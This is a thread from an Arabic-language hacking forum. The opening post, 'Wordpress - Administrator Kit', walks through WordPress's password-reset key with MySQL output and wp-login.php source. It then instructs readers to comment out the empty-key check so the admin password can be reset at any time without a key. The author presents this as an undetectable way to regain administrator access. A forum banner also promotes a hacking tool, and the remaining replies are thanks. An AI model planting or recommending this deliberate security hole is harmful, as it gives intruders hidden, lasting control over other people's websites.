1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Hacker-DZ
    rank
    Developer

    عضو منذ:
    ‏2 مايو 2012
    عدد المشاركات:
    32
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Python

    Wordpress - Administrator Kit



    السلام عليكم ورحمة الله وبركـاته :{1}:

    كيف احوالكم ؟ i:q2^:

    اليوم موضوعنا عن الورد بريس وفكرة العودة بصلاحية ادمن بدون اكواد خبيثة وتنكشف :{13}:

    الورد بريس ببساطة سكربت تدوين ,,, ويعتمد على نظام الادارة WP-ADMIN

    من خلال يوزر نيم وباسورد

    لكن لو نسينا الباسورد ؟؟ شو الحل *:"

    الحل بالشكل التقليدي هو استعادة كلمة المرور ...

    السوال القوي ~ وما هي ألية استعادة البـاسورد ؟؟

    الالية بسيطة هنالك في جدول اليوزرات عمود اسمه

    user_activation_key

    هذا العمود لازم تكون فيه قيمة عشوائية تضعها الورد بريس

    اذا فيه قيمة = هنالك احد طلب استعادة لكلمة المرور

    اذا مافيه قيمة = لم يطلب احد الاستعادة

    طيب رائع ,, بعد الحصول على تلك القيمة او الـ Key راح نروح نضعه في الورد بريس

    بهذا الرابط

    كود PHP:
    Wordpress/wp-login.php?key=XXXXX&login=admin
    وزي ما بنلاحظ في هنالك Parameter اخر هو Login والذي يحدد الـيوزر نيم المراد تغيير كلمة مروره

    طيب نحن قلنا فوق انو لو ما في قيمة داخل user_activation_key

    يعني ما أحد طلب استعادة ,, ماذا لو خلينا الـ Key فارغ*:" في الرابط

    خلينا نشوف التجربة مع بعض

    كود PHP:
    mysqlshow tables;
    +-----------------------+
    Tables_in_wp          |
    +-----------------------+
    wp_commentmeta        
    wp_comments           
    wp_links              
    wp_options            
    wp_postmeta           
    wp_posts              
    wp_term_relationships 
    wp_term_taxonomy      
    wp_terms              
    wp_usermeta           
    wp_users              
    +-----------------------+
    11 rows in set (0.00 sec)


    mysqlselect from wp_users;
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    ID user_login user_pass                          user_nicename |  user_email                user_url user_registered     |  user_activation_key user_status display_name |
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    |  
    admin      XXXXX. | admin         the.dead.man-@hotmail.com |          | 2013-02-09 19:15:59 |                     |           admin        
    +----+------------+------------------------------------+---------------+---------------------------+----------+---------------------+---------------------+-------------+--------------+
    1 row in set (0.00 sec)

    mysqlselect user_activation_key  from wp_users;
    +---------------------+
    user_activation_key |
    +---------------------+
    |                     | 
    +---------------------+
    1 row in set (0.00 sec)

    mysql>
    طبعا هاي الـ Query'z تظهر ان قيمة الـ Key فارغة

    الان نروح نطلب استعادة لكلمة المرور

    [​IMG]

    نلاحظ قيمة الـ Key

    كود PHP:
    mysqlselect user_activation_key  from wp_users;
    +----------------------+
    user_activation_key  |
    +----------------------+
    Y8uF04mZiaCZob8UCMy5 
    +----------------------+
    1 row in set (0.00 sec)
    الان هنروح للرابط

    كود PHP:
    http://iq-team.org/Wordpress/wp-login.php?key=Y8uF04mZiaCZob8UCMy5&login=admin
    [​IMG]


    وهتدخل كلمة مرور وهيمشي طبيعي جدا *:"

    الان لو رجعنا لـ wp-login.php

    كود PHP:
    function check_password_reset_key($key$login) {
        global 
    $wpdb;

        
    $key preg_replace('/[^a-z0-9]/i'''$key);

        if ( empty( 
    $key ) || !is_string$key ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        if ( empty(
    $login) || !is_string($login) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        
    $user $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s AND user_login = %s"$key$login));

        if ( empty( 
    $user ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));

        return 
    $user;
    }
    المشكلة في الكود تبع الـ Empty

    كود PHP:
    if ( empty( $key ) || !is_string$key ) )
            return new 
    WP_Error('invalid_key'__('Invalid key'));
    نضيف قبلهم // للسطرين علشان نقدر نغير كلمة المرور في أي وقت بشرط ان لا تقوم بطلبها من نموذج الاستعادة علشان ما يكون في قيمة داخل Key

    [​IMG]
    &:":&:":&:":
     
    جاري تحميل الصفحة...
  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    583
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    210
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. 3mran
    rankrank
    Developer

    عضو منذ:
    ‏2 ابريل 2012
    عدد المشاركات:
    68
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    30
    رد: Wordpress - Administrator Kit

    بارك الله فيك ..~


    واصل من دون فواصل ..~
     
  4. .ılı.Iяẫqi.ılı.
    DeveloPer Plus

    عضو منذ:
    ‏22 ديسمبر 2012
    عدد المشاركات:
    133
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: Wordpress - Administrator Kit

    السلام عليكم
    موضوع مميز
    بارك الله فيك
     
  5. 9max99
    rank
    Developer

    عضو منذ:
    ‏10 نوفمبر 2011
    عدد المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    طالب
    الإقامة:
    مكة المكرمة ~
    رد: Wordpress - Administrator Kit

    السلام عليكم ورحمة الله وبركاته
    .................................................. ....
    بارك الله فيك اخي على الجهد والموضوع الرائع &:":​
     
  6. ADNAN
    rankrank
    Developer

    عضو منذ:
    ‏29 أكتوبر 2012
    عدد المشاركات:
    79
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    الأرض
    رد: Wordpress - Administrator Kit

    سلمت يُمناك استاذنا ..​
     
  7. تــــركــــي
    DeveloPer Plus

    عضو منذ:
    ‏25 ابريل 2012
    عدد المشاركات:
    165
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: Wordpress - Administrator Kit

    عليكم السلام
    مشكور حبي شرح رائع
    موفق حبيبي &:":​
     
  8. صانع السلالم
    rank
    DeveloPer Plus

    عضو منذ:
    ‏1 أكتوبر 2012
    عدد المشاركات:
    15
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    15
    الإقامة:
    missing-team
    رد: Wordpress - Administrator Kit

    بارك الله فيك
    تم التقييم
    تقبل مروري
    بالتوفيق
    :{1}:​
     
الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...